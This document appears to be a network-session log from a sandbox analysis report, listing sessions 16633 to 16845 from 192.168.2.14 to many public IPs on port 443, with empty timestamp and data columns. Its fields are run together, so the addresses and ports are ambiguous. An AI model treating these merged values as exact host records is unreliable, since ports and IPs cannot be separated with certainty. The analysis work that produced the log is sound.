                                                      16633192.168.2.1455198210.31.121.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16634192.168.2.145681262.218.197.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16635192.168.2.1455470145.52.69.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16636192.168.2.143310878.118.35.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16637192.168.2.144969023.32.27.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16638192.168.2.144483646.86.54.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16639192.168.2.1460996189.244.209.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16640192.168.2.1439332184.140.60.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16641192.168.2.1440422173.58.94.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16642192.168.2.1434088202.19.15.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16643192.168.2.1452722163.72.165.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16644192.168.2.1444006197.31.74.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16645192.168.2.145865270.61.7.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16646192.168.2.143969641.66.46.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16647192.168.2.144219881.57.134.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16648192.168.2.1437370177.168.121.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16649192.168.2.1434556211.98.88.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16650192.168.2.143847871.234.187.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16651192.168.2.1441966222.111.239.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16652192.168.2.1447252206.224.167.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16653192.168.2.143544023.103.68.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16654192.168.2.1456076206.222.196.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16655192.168.2.1452626212.104.181.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16656192.168.2.1456084121.249.5.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16657192.168.2.1442864102.197.179.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16658192.168.2.1460808134.154.217.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16659192.168.2.1446684125.244.13.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16660192.168.2.1434724138.188.230.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16661192.168.2.1433724189.0.180.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16662192.168.2.14581425.26.165.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16663192.168.2.144604045.72.152.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16664192.168.2.145935239.19.234.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16665192.168.2.144508674.243.153.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16666192.168.2.145497297.44.185.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16667192.168.2.1438106170.232.20.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16668192.168.2.14457365.128.238.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16669192.168.2.1454372100.127.198.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16670192.168.2.1435746171.215.4.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16671192.168.2.143548052.190.103.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16672192.168.2.143784670.47.130.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16673192.168.2.144251257.214.150.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16674192.168.2.1450830211.158.28.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16675192.168.2.1452984172.228.109.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16676192.168.2.144028270.19.58.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16677192.168.2.1441806114.106.125.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16678192.168.2.1450396156.94.131.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16679192.168.2.145368859.152.239.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16680192.168.2.145169627.9.39.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16681192.168.2.144696214.171.210.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16682192.168.2.143800818.208.114.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16683192.168.2.145618249.109.37.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16684192.168.2.145891898.58.145.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16685192.168.2.144721283.43.125.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16686192.168.2.1447776195.232.234.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16687192.168.2.1445088158.126.27.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16688192.168.2.1456598124.184.138.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16689192.168.2.1437848209.92.219.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16690192.168.2.1442824118.8.174.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16691192.168.2.1437048202.191.28.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16692192.168.2.145092897.170.255.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16693192.168.2.1448062194.253.67.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16694192.168.2.144094645.96.142.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16695192.168.2.145099844.34.21.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16696192.168.2.1459326160.159.127.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16697192.168.2.144276439.159.217.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16698192.168.2.1446598185.249.78.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16699192.168.2.1453560175.188.132.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16700192.168.2.145857488.8.17.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16701192.168.2.143559040.52.245.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16702192.168.2.1435636136.9.119.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16703192.168.2.1444422102.47.110.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16704192.168.2.145046872.73.236.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16705192.168.2.1434728149.209.57.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16706192.168.2.143637643.207.157.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16707192.168.2.145188817.241.56.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16708192.168.2.1435518105.116.66.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16709192.168.2.1446490178.124.185.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16710192.168.2.1455524152.186.171.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16711192.168.2.144768648.53.215.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16712192.168.2.145152247.239.71.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16713192.168.2.1442318202.97.36.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16714192.168.2.1456126206.85.12.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16715192.168.2.1438034128.238.234.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16716192.168.2.143601234.88.19.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16717192.168.2.1455130156.255.226.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16718192.168.2.1434076148.25.45.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16719192.168.2.1452206110.9.186.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16720192.168.2.1441258151.142.15.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16721192.168.2.144762462.152.65.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16722192.168.2.1434094114.102.88.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16723192.168.2.1435904222.83.148.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16724192.168.2.144629243.116.188.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16725192.168.2.144624279.166.220.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16726192.168.2.146080275.147.173.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16727192.168.2.144906236.79.26.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16728192.168.2.143394666.84.43.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16729192.168.2.144240265.176.38.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16730192.168.2.1441908195.66.198.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16731192.168.2.143496674.231.113.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16732192.168.2.14548908.4.32.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16733192.168.2.144868838.96.111.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16734192.168.2.1436262130.56.231.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16735192.168.2.1441946112.200.142.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16736192.168.2.1445276151.23.133.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16737192.168.2.146050675.119.35.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16738192.168.2.144599875.149.49.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16739192.168.2.1437898143.224.7.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16740192.168.2.145007424.26.171.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16741192.168.2.144691895.39.40.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16742192.168.2.14491265.103.172.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16743192.168.2.1440808104.149.246.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16744192.168.2.145765271.57.115.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16745192.168.2.143426670.10.12.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16746192.168.2.1438270143.52.74.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16747192.168.2.1450410167.3.217.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16748192.168.2.145933683.79.121.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16749192.168.2.1455518138.46.255.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16750192.168.2.1459484178.113.209.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16751192.168.2.146073486.204.54.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16752192.168.2.145923667.173.182.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16753192.168.2.1447736142.94.195.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16754192.168.2.144883298.107.186.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16755192.168.2.1434858217.224.72.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16756192.168.2.1444770218.225.200.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16757192.168.2.144445834.43.43.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16758192.168.2.143740812.111.113.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16759192.168.2.144764292.177.190.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16760192.168.2.1434768143.141.197.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16761192.168.2.145348269.205.7.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16762192.168.2.144102654.46.167.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16763192.168.2.1436326122.239.241.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16764192.168.2.1439886149.207.9.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16765192.168.2.143476017.78.189.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16766192.168.2.143461067.126.91.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16767192.168.2.1446358168.220.65.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16768192.168.2.1437866131.234.58.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16769192.168.2.143754637.141.151.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16770192.168.2.1459220203.36.44.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16771192.168.2.1443586145.105.218.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16772192.168.2.1452188182.232.123.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16773192.168.2.1440938181.103.204.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16774192.168.2.144355688.229.132.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16775192.168.2.1457916161.33.213.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16776192.168.2.144941650.48.21.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16777192.168.2.1443236110.74.103.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16778192.168.2.1443020219.21.249.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16779192.168.2.1444456198.210.30.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16780192.168.2.1445270143.200.142.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16781192.168.2.1437572167.61.38.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16782192.168.2.145111492.105.247.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16783192.168.2.1456768171.43.100.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16784192.168.2.1433776212.21.190.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16785192.168.2.144897632.138.255.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16786192.168.2.144348846.215.210.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16787192.168.2.1446718139.42.14.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16788192.168.2.145781472.171.57.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16789192.168.2.143904496.48.143.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16790192.168.2.1444720169.10.149.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16791192.168.2.1439928194.243.127.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16792192.168.2.1443824150.77.62.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16793192.168.2.144699840.187.168.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16794192.168.2.1444448104.122.67.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16795192.168.2.144954620.18.66.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16796192.168.2.1441500115.181.255.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16797192.168.2.1442886201.74.26.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16798192.168.2.1439322125.107.178.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16799192.168.2.1445356143.230.118.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16800192.168.2.1438320184.93.82.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16801192.168.2.143288298.130.7.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16802192.168.2.1460142134.200.254.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16803192.168.2.1438140136.38.115.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16804192.168.2.1456784120.192.65.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16805192.168.2.143432282.161.214.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16806192.168.2.1459798164.109.124.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16807192.168.2.1438520145.68.191.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16808192.168.2.1432998146.134.74.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16809192.168.2.144089896.237.161.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16810192.168.2.1454280153.100.175.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16811192.168.2.1435492198.126.159.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16812192.168.2.144975849.200.158.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16813192.168.2.145981893.51.50.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16814192.168.2.143669235.239.250.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16815192.168.2.1451716119.47.254.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16816192.168.2.144376692.232.203.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16817192.168.2.14435349.217.148.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16818192.168.2.1454376161.116.222.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16819192.168.2.1444130178.200.63.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16820192.168.2.145747899.52.122.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16821192.168.2.145716677.215.94.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16822192.168.2.1450968165.193.140.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16823192.168.2.143289071.224.86.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16824192.168.2.1455950223.147.234.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16825192.168.2.1446206197.115.242.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16826192.168.2.1456484117.4.216.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16827192.168.2.1439136198.158.175.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16828192.168.2.1443726145.38.5.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16829192.168.2.145896847.155.93.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16830192.168.2.143788283.121.0.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16831192.168.2.1449684161.52.206.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16832192.168.2.1435390101.14.78.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16833192.168.2.1443556130.176.82.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16834192.168.2.1457614221.183.11.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16835192.168.2.1459564135.196.34.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16836192.168.2.145143264.78.64.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16837192.168.2.1445338222.27.224.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16838192.168.2.1439972169.71.18.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16839192.168.2.1453938154.4.78.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16840192.168.2.1449220102.103.62.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16841192.168.2.1447246142.121.25.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16842192.168.2.143687413.249.163.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16843192.168.2.14332361.202.241.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16844192.168.2.1456394201.12.211.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16845192.168.2.143673612.35.217.185443
